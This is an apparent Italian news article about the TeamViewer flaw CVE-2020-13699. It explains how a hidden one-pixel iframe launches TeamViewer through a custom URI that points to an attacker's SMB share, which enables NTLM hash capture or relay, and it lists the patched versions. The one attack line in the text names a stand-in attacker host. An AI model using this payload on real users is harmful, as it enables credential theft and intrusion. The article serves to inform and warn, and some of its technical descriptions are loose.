TeamViewer è una delle applicazioni più popolari e utilizzate per l’accesso ad un PC da remoto. Viene utilizzata non solo in ambito domestico ma anche professionale, soprattutto per fornire assistenza tecnica a distanza.
Recentemente però il software era afflitto da un bug che permetteva ad un attaccante di stabilire una connessione con un sistema ed eseguire exploit su di esso. Questo exploit poi garantiva all’hacker il pieno accesso al PC della vittima, potendo eseguire codice arbitrario e utilizzare attacchi di brute-force per rubare informazioni riservate come password e codici di accesso. Con il codice CVE-2020-13699, la vulnerabilità faceva parte delle cosiddette Unquoted Search Path or Element (CWE-428), ossia delle falle che permettono di inviare del codice arbitrario al comando passandoglielo come semplice input da tastiera o anche tramite script.
Per eseguire un attacco, era necessario che l’utente navigasse semplicemente su una pagina web contenente un iframe nascosto all’interno del codice HTML della pagina, magari rendendolo grande quanto un singolo pixel così che il visitatore non lo noti (vedere immagine). Questo iframe va a lanciare l’applicazione TeamViewer tramite l’attributo “src=”teamviewer10: –play \\attacker-IP\share\fake.tvs“, un URI custom che solitamente viene installato in automatico quando andiamo ad installare applicazioni come TeamViewer, Skype o Zoom per poterle avviare anche tramite browser. A questo punto una volta che l’utente visita la pagina, va ad avviare anche TeamViewer in background, che si connetterà al server dell’attaccante tramite il protocollo SMB di Windows, che stabilirà quindi la connessione tra l’hacker e il PC della vittima.
A scoprire questa vulnerabilità è stato Jeffrey Hofmann, security engineer presso Praetorian. Egli ha sottolineato anche come il protocollo SMB stesso permetta all’attaccante di accedere al PC come utente autenticato, in quanto SMB non esegue il controllo sull’utente che richiede la connessione ma stabilisce direttamente il contatto come utente legittimo, permettendo praticamente a chiunque di sfruttare vulnerabilità simili per prendere possesso di un intero sistema. Hofmann ha affermato che “Windows eseguirà l’autenticazione NTLM quando si apre la condivisione SMB e tale richiesta può essere inoltrata (utilizzando uno strumento come il responder) per l’esecuzione del codice (o catturata per il cracking dell’hash di una password)“. Per quanto fosse un problema molto grave, trovare la soluzione è stato abbastanza semplice. Infatti è bastato solamente rendere l’input come un semplice valore (utilizzando le virgolette) e non come un comando da eseguire. In questo modo qualsiasi input verrà dato all’applicazione, verrà trattato come una semplice stringa ed eventuali script o server verranno ignorati.
Attualmente la falla è stata risolta ma gli utenti Windows di TeamViewer dovrebbero prendere in considerazione l’aggiornamento a una o più versioni con patch, che includono: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, e 15.8.3.
Fonte: Bleeping Computer